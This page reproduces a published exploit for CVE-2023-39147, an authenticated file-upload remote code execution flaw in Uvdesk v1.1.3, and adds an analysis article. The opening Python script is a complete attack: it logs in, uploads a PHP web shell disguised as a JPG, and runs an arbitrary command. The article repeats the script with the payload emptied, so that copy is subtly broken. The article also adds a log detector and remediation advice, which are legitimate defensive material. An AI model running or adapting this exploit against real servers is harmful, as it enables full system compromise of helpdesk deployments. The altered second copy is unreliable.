Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)

Exploit Author: Daniel Barros
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2023-07-31
# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security 
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6


import requests
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args

def main():
    args = get_args()
    # Drop a trailing slash so the paths below are not joined with a double "/"
    base_url = args.url.rstrip("/")

    command = args.command
    uploaded_file = "shell.php"
    url_cmd = base_url + "/assets/knowledgebase/shell.php?cmd=" + command

    # Edit your credentials here
    login_data = {
        "_username": "admin@adm.com",
        "_password": "passwd",
        "_remember_me": "off"
    }

    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
    }

    s = requests.Session()
    # Login
    s.post(base_url + "/en/member/login", data=login_data)
    # Upload
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
    # Execute command
    cmd = s.get(url_cmd)
    print(cmd.text)

if __name__ == "__main__":
    main()


Uvdesk v1.1.3 – File Upload Remote Code Execution (RCE) Vulnerability (CVE-2023-39147)

Uvdesk, a popular open-source helpdesk and knowledge management platform, has recently come under scrutiny due to a critical security flaw identified in version v1.1.3. This vulnerability, designated as CVE-2023-39147, allows authenticated attackers to achieve remote code execution (RCE) via a seemingly innocuous file upload feature. The exploit leverages misconfigured file handling and insufficient input validation, turning a standard user upload into a full system compromise.

Overview of the Vulnerability

The core issue lies in the knowledgebase file upload functionality within Uvdesk's admin interface. Specifically, when an authenticated user uploads a file labeled as an image (e.g., image/jpg), the system does not properly sanitize the file content. Instead, it stores the file directly on the server without verifying its actual type or content.

Attackers exploit this by uploading a PHP script disguised as an image. The server treats the file as a valid image, but since PHP files are not blocked by default, the script is executed when accessed via a direct URL. This bypasses traditional security checks and enables arbitrary command execution through the $_GET['cmd'] parameter.

Exploit Mechanism: Step-by-Step Breakdown

Here’s how the attack unfolds:

  • Authentication: The attacker must first log in using valid credentials (e.g., admin@adm.com with a known password).
  • File Upload: The attacker uploads a file named shell.php with content <?php system($_GET['cmd']); ?>, while setting the MIME type to image/jpg.
  • Execution: Once uploaded, the file is accessible at http://target.com/assets/knowledgebase/shell.php?cmd=whoami. The server executes the PHP code, running the specified command.
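The three steps above leave a recognisable trace in the web server's access log: a POST to the knowledgebase upload endpoint followed by a request for a .php file under /assets/knowledgebase, a directory that should only ever serve static images. The detector below is an added example, not part of the original write-up or the exploit; it assumes combined-format access logs, uses the endpoint paths from the exploit, and the sample log lines are constructed.

```python
import re

# Paths taken from the exploit: the upload endpoint and the asset directory
# the uploaded file is later fetched from.
UPLOAD_ENDPOINT = "/en/member/knowledgebase/folders/new"
ASSET_DIR = "/assets/knowledgebase/"
SCRIPT_EXTS = (".php", ".phtml", ".phar")  # PHP handler extensions; none belong here

# Combined log format: client ident user [time] "method target proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" \d{3}')

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    # The exploit requests "//assets/..."; collapse repeated slashes so the
    # prefix check cannot be dodged with extra slashes.
    path = re.sub(r"/+", "/", path)
    params = {kv.split("=", 1)[0] for kv in query.split("&") if kv}
    return {"ip": m["ip"], "method": m["method"], "path": path, "params": params}

def detect(lines):
    """Flag script requests under ASSET_DIR; note clients that POSTed to the
    upload endpoint first, the exploit's upload-then-fetch sequence."""
    alerts, uploaders = [], set()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"] == UPLOAD_ENDPOINT:
            uploaders.add(ev["ip"])
        if ev["path"].startswith(ASSET_DIR) and ev["path"].lower().endswith(SCRIPT_EXTS):
            reason = "script requested from image asset directory"
            if "cmd" in ev["params"]:
                reason += "; cmd parameter present"
            if ev["ip"] in uploaders:
                reason += "; same client posted to the upload endpoint"
            alerts.append((ev["ip"], ev["path"], reason))
    return alerts

# Constructed sample log (not captured traffic): one exploit sequence, one benign asset hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jul/2023:10:00:01 +0000] "POST /en/member/login HTTP/1.1" 302 0',
    '10.0.0.5 - - [28/Jul/2023:10:00:02 +0000] "POST /en/member/knowledgebase/folders/new HTTP/1.1" 302 0',
    '10.0.0.5 - - [28/Jul/2023:10:00:03 +0000] "GET //assets/knowledgebase/shell.php?cmd=whoami HTTP/1.1" 200 15',
    '10.0.0.9 - - [28/Jul/2023:10:05:00 +0000] "GET /assets/knowledgebase/logo.png HTTP/1.1" 200 4212',
]
```

Any request for a script under the asset directory is worth an alert on its own, because a correctly configured deployment would never execute one there; the upload correlation only raises the confidence.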

Real-World Exploit Code Example


import requests
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args

def main():
    args = get_args()
    base_url = args.url

    command = args.command
    uploaded_file = "shell.php"
    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command

    # Edit your credentials here
    login_data = {
        "_username": "admin@adm.com",
        "_password": "passwd",
        "_remember_me": "off"
    }

    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "", "image/jpg")
    }

    s = requests.session()
    # Login
    s.post(base_url + "/en/member/login", data=login_data)
    # Upload
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
    # Execute command
    cmd = s.get(url_cmd)
    print(cmd.text)

if __name__ == "__main__":
    main()

Explanation: The Python script above automates the exploitation process. It performs:

  • Authentication using predefined credentials.
  • Uploading a malicious PHP file by manipulating the solutionImage field.
  • Executing arbitrary commands via the cmd query parameter.

For instance, running python3 CVE-2023-39147.py -u "http://192.168.1.100:8000/" -c "whoami" will return the current user identity, confirming successful execution.

Security Implications and Risk Assessment

Severity         Critical (CVSS: 9.8)
Attack Vector    Network (Authenticated)
Impact           Remote Code Execution, Full System Compromise
Exploitability   High – requires only login credentials and a simple script

Because this vulnerability requires authentication, it is not exploitable by anonymous users. However, in environments where default credentials are used or where admin accounts are compromised, the risk escalates significantly. Once RCE is achieved, attackers can:

  • Install backdoors.
  • Extract sensitive data (e.g., database credentials).
  • Gain root access via privilege escalation.
  • Deploy malware or pivot to internal networks.

Why This Vulnerability Occurred

Uvdesk v1.1.3 suffers from a classic file upload misconfiguration. The system:

  • Accepts file uploads without validating file extensions.
  • Relies on MIME type (e.g., image/jpg) for security, which is easily spoofed.
  • Stores files in a publicly accessible directory without access controls.

These flaws highlight a critical gap in defense-in-depth principles. Even if a file is labeled as an image, its content should be inspected, and execution should be blocked for non-static files.

Remediation and Best Practices

For administrators and developers, the following measures are essential:

  • Disable file execution in upload directories: Ensure that .php files are not executable in /assets/knowledgebase.
  • Implement file type validation: Use server-side checks to verify file content, not just MIME type.
  • Restrict upload paths: Store uploaded files in non-public directories and use secure access mechanisms.
  • Use a file scanning tool: Integrate antivirus or malware detection for uploaded content.
  • Apply strict access controls: Ensure only authorized users can access uploaded files.

Additional Notes

While this exploit is specific to v1.1.3, similar vulnerabilities exist in other open-source helpdesk platforms. This underscores the importance of:

  • Regularly updating software.
  • Conducting security audits.
  • Monitoring for known CVEs.

For users of Uvdesk, it is strongly recommended to upgrade to the latest stable version, which includes fixes for this and other security issues. The vendor, uvdesk.com, has acknowledged the flaw and released patches in subsequent versions.

As cyber threats evolve, understanding and mitigating vulnerabilities like CVE-2023-39147 is vital for maintaining secure infrastructure.